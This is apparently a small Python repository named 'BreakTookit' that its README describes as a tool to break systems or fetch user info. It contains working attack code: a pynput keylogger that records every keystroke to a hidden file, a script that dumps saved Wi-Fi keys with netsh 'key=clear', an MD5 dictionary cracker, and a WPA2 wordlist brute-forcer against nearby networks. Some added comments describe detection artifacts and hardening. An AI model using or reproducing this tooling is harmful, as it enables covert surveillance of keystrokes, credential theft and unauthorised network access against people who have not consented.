├── .gitignore
├── README.md
├── keylogger.py
├── md5crash.py
├── Base.py
├── getWifiPassword.py
└── wifi_crack.py


/.gitignore:
--------------------------------------------------------------------------------
.idea/
*.pyc
*.txt
dict/
*.log


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# BreakTookit
Useful tool to break system or fetch user info
Keep on update on this project
----
* getWifiPassword.py Get system stored wifi password
* md5crash.py Crash md5 hash by file
* keylogger.py record your keyboad typing


--------------------------------------------------------------------------------
/keylogger.py:
--------------------------------------------------------------------------------
#-*-coding=utf-8-*-
# Keystroke recorder (Python 2 syntax: bare `print` statements below).
# A pynput keyboard Listener is started and every key-press event is written,
# with a timestamp, to a plaintext file named keylog.txt inside the directory
# named by the WINDIR environment variable.
#
# Observable artifacts for detection: a keylog.txt file in that directory
# that grows while the process runs, and a long-lived Python process that
# has pynput loaded.
from pynput.keyboard import Key,Listener  # Key is imported but not used below
import logging
import os

# Raises KeyError when WINDIR is not set, so the script only gets past this
# line where that variable exists (normally Windows).
log_dir = os.environ['WINDIR']
#log_dir = ''
print log_dir
# Shows whether the current user may write to that directory. The result is
# only printed; nothing below branches on it.
print os.access(log_dir,os.W_OK)

# Root logger -> <WINDIR>/keylog.txt, one "<timestamp>: <key>" line per event.
logging.basicConfig(filename=os.path.join(log_dir,'keylog.txt'),level=logging.DEBUG,format='%(asctime)s: %(message)s')
def on_press(key):
    """Listener callback: log the key object passed in for one key press."""
    logging.info(key)

# join() blocks the main thread for as long as the listener keeps running.
with Listener(on_press=on_press) as listener:
    listener.join()


--------------------------------------------------------------------------------
/md5crash.py:
--------------------------------------------------------------------------------
# -*-coding=utf-8-*-
# crash md5 hash password
#
# Dictionary check of one unsalted MD5 digest against a wordlist file
# (Python 2 syntax: `print` statements, `except Exception, e`, raw_input).
# Defensive takeaway: a bare MD5 of a password costs one cheap hash per
# candidate to test, which is why password storage should use a salted,
# deliberately slow KDF (bcrypt, scrypt, Argon2, PBKDF2) instead.

import hashlib

import os


def md5cracker(hash_string,raw_file):
    """Compare hash_string with the MD5 of every line of raw_file.

    hash_string: hex MD5 digest to look for; it is lower-cased before
        comparison, so upper-case hex input also matches.
    raw_file: path of a text file holding one candidate per line.

    Prints "Not found on loop N" for each non-matching candidate. On a match
    it prints the candidate and its 1-based position and returns None.
    Any exception (for example a missing wordlist) is printed and the
    process exits.
    """
    count = 1
    hash_string=hash_string.lower()
    try:
        # The handle is never closed explicitly, and readlines() loads the
        # whole wordlist into memory before the first comparison.
        f = open(raw_file, 'r')
        for i in f.readlines():
            # strip() drops the newline and any other surrounding whitespace,
            # so candidates are hashed without leading/trailing blanks.
            if hash_string == hashlib.md5(i.strip()).hexdigest():
                print "Password is {} !!! Found on loop {}".format(i.strip(), count)
                return
            else:
                print "Not found on loop {}".format(count)
                count += 1
    except Exception, e:
        print e
        exit()

# Script entry: the digest is read interactively; the wordlist path is fixed
# to ./dict/rkolin_all.txt under the current working directory. The
# repository's .gitignore excludes dict/ and *.txt, so that file is not part
# of the listing.
hash_string = raw_input('Please input hash string that you want to crack: ')
raw_file = os.path.join(os.getcwd(),'dict','rkolin_all.txt')
md5cracker(hash_string,raw_file)


--------------------------------------------------------------------------------
/Base.py:
--------------------------------------------------------------------------------
import logging
import time  # not used in this module

class BaseServices(object):
    """Base class that gives subclasses a logger writing to a file and the console."""

    def get_lloger(self,filename='default.log'):
        """Return a DEBUG-level logger that writes to `filename` and to the console.

        The logger is registered under the name `filename`. Every call
        attaches a fresh FileHandler and StreamHandler to that named logger,
        so calling this twice with the same filename duplicates each record.
        """
        logger = logging.getLogger(filename) # without a name this would configure the root logger

        logger.setLevel(logging.DEBUG) # set the output level

        # The backslash before "[" and the final ")" are part of the format
        # string and end up in every log line.
        formatter = logging.Formatter(
            '[%(asctime)s][%(filename)s][line: %(lineno)d]\[%(levelname)s] ## %(message)s)',
            datefmt='%Y-%m-%d %H:%M:%S')

        # FileHandler writes records to the file
        fh = logging.FileHandler(filename)
        fh.setLevel(logging.DEBUG)
        fh.setFormatter(formatter)

        # StreamHandler writes records to the screen
        ch = logging.StreamHandler()
        ch.setLevel(logging.DEBUG)
        ch.setFormatter(formatter)

        # attach both handlers
        logger.addHandler(ch)
        logger.addHandler(fh)
        return logger


--------------------------------------------------------------------------------
/getWifiPassword.py:
--------------------------------------------------------------------------------
#-*-coding=utf-8-*-
import subprocess

# get system store wifi password
#
# Reads the Wi-Fi profiles saved on a Windows host by running netsh twice:
# once to list the profiles, then once per profile with key=clear to display
# the stored key (Python 2 syntax: `print` statement at the bottom).
#
# Both commands go through the shell (shell=True), so process-creation
# telemetry shows netsh being started with "wlan show profile ... key=clear"
# on its command line; that command line is the observable to monitor.

def getwifipassword():
    """Return a dict mapping each saved Wi-Fi profile name to its stored key.

    A profile whose output has no 'Key Content' line maps to ''.
    Matching relies on the English labels 'All User Profile' and
    'Key Content' in the netsh output, and split(':')[1] keeps only the text
    between the first and second colon, so names or keys containing ':' are
    truncated.
    """
    cmd = 'netsh wlan show profiles'
    # stderr is piped but never read, and the child is never waited on.
    p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)
    ret = p.stdout.readlines()
    profile = [i.split(':')[1].strip() for i in ret if 'All User Profile' in i]
    cmd_pwd = 'netsh wlan show profile {} key=clear'
    ap_password={}
    for ap in profile:
        # NOTE(review): the profile name is placed into the shell command
        # unquoted, so a name with spaces or shell metacharacters changes
        # the command that actually runs.
        p = subprocess.Popen(cmd_pwd.format(ap), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        ret = p.stdout.readlines()
        password = [i.split(':')[1].strip() for i in ret if 'Key Content' in i]
        if not password:
            ap_password[ap]=''
        else:
            ap_password[ap]=password[0]
    return ap_password


# Runs on import/execution and prints the whole name -> key mapping to stdout.
print getwifipassword()


--------------------------------------------------------------------------------
/wifi_crack.py:
--------------------------------------------------------------------------------
# Scan Wi-Fi
#
# Tries every passphrase from a wordlist against every SSID found in a scan,
# using pywifi with a WPA2-PSK profile (Python 3 syntax: f-strings).
# Behaviour visible in this file that matters for detection and hardening:
#   * one association attempt per candidate, each followed by a fixed sleep,
#     which an access point or WLAN controller sees as a steady series of
#     failed WPA2 handshakes from a single client;
#   * a passphrase that works is written in cleartext to the log file and
#     the console by the logger from Base.py;
#   * only passphrases present in the wordlist are ever tried.
import time
from pywifi import const
import pywifi
from Base import BaseServices

# Default number of seconds to sleep after a scan, connect or disconnect request.
DEFAULT = 3.4

class WIFI(BaseServices):
    """Scan for networks and test wordlist passphrases against each SSID."""

    def __init__(self):
        """Create the logger, select a wireless interface and load both lists."""
        self.logger = self.get_lloger()
        self.wifi=pywifi.PyWiFi()
        # Index 1 is hard-coded: the second interface pywifi reports is used,
        # and an IndexError is raised when fewer than two exist.
        self.iface = self.wifi.interfaces()[1]
        self.password_list = self.get_password()
        self.ignore_list=self.get_ignore()
        print(self.ignore_list)


    def get_ignore(self):
        """Return the stripped lines of ignore_list.txt (relative to the cwd).

        If the file is empty, ignore_l is never assigned and the return
        statement raises UnboundLocalError; a missing file raises from open().
        """
        ignore_list = None
        with open('ignore_list.txt','r') as f:
            ignore_list=f.readlines()

        if ignore_list:
            ignore_l=[i.strip() for i in ignore_list]

        return ignore_l

    def get_password(self):
        """Return the raw lines (newlines included) of the hard-coded wordlist file."""

        password_list=[]
        path = r'C:\git\workspace\weak_dict.txt'
        with open(path,'r') as f:
            password_list = f.readlines()

        return password_list

    def start(self):
        """Scan once, then try each wordlist entry against each non-ignored SSID.

        SSIDs for which no entry succeeds are appended to ignore_list.txt so
        that a later run skips them.
        """

        basewifi = self.scan(10)

        # The method object itself is tested here (it is not called), so the
        # condition is always true; the branch body is a no-op either way.
        if self.wifi_connect_status:
            # disconnect
            # self.disconnect()
            pass

        print(len(basewifi))
        ssid_list = []
        for i in basewifi:

            try:

                print(i.ssid+'\n')
                # Skip results whose SSID is empty or whitespace only.
                if len(i.ssid.strip())<1:
                    continue

                ssid_list.append(i.ssid)
            except Exception as e:
                print(e)


        # De-duplicate: the same SSID can appear several times in one scan.
        ssid_set = set(ssid_list)

        for i in ssid_set:
            if i in self.ignore_list:
                continue
            # Output label means "wifi scan result".
            print('wifi 扫描结果:{}'.format(i))
            # Output label means "MAC address of the device", but the value
            # formatted in is the SSID again, not a BSSID.
            print('wifi 对应设备的MAC地址: {}'.format(i))
            print('='*10)
            found =False
            for p in self.password_list:

                # strip() removes the newline kept by get_password().
                if self.connect(i,p.strip()):
                    found =True
                    break
                else:
                    pass
            if not found:
                print('not found')
                try:
                    with open('ignore_list.txt','a') as f:
                        f.write(i+'\n')
                except Exception as e:
                    print(e)
                    pass


    def wifi_connect_status(self):
        """Return True when the interface status is IFACE_CONNECTED or IFACE_INACTIVE."""
        if self.iface.status() in [const.IFACE_CONNECTED,const.IFACE_INACTIVE]:
            return True
        else:
            return False

    def scan(self,sleep_time=DEFAULT):
        """Trigger a scan, wait sleep_time seconds, and return the scan results."""
        self.iface.scan()
        time.sleep(sleep_time)
        basewifi = self.iface.scan_results()
        return basewifi

    def connect(self,ssid,password,sleep_time=DEFAULT):
        """Try to join `ssid` with `password`; return True if the status check passes.

        A WPA2-PSK / CCMP profile is built for the attempt. Every network
        profile already saved on the interface is removed first, so the host
        running this loses its stored networks. After sleep_time seconds the
        result of wifi_connect_status() decides the return value.
        """
        profile = pywifi.Profile()
        profile.ssid=ssid
        profile.auth=const.AUTH_ALG_OPEN
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        profile.cipher=const.CIPHER_TYPE_CCMP
        profile.key=password
        self.iface.remove_all_network_profiles()
        current_profile = self.iface.add_network_profile(profile)
        self.iface.connect(current_profile)

        time.sleep(sleep_time)

        if self.wifi_connect_status():

            # Messages mean "<ssid> connected successfully" and
            # "the password of <ssid> is <password>"; both go, in cleartext,
            # to the log file and console configured in Base.py.
            self.logger.info(f'{ssid} 连接成功')
            self.logger.info(f'{ssid}的密码是{password}')
            return True

        else:
            # print('connection failed')
            # self.fp.write(ssid+'\n')
            return False

    def disconnect(self,sleep_time=DEFAULT):
        """Ask the interface to disconnect, then wait sleep_time seconds."""
        self.iface.disconnect()
        time.sleep(sleep_time)

if __name__ == "__main__":
    wifi = WIFI()
    # wifi.scan()
    # wifi.disconnect()
    # wifi.connect()
    wifi.start()


--------------------------------------------------------------------------------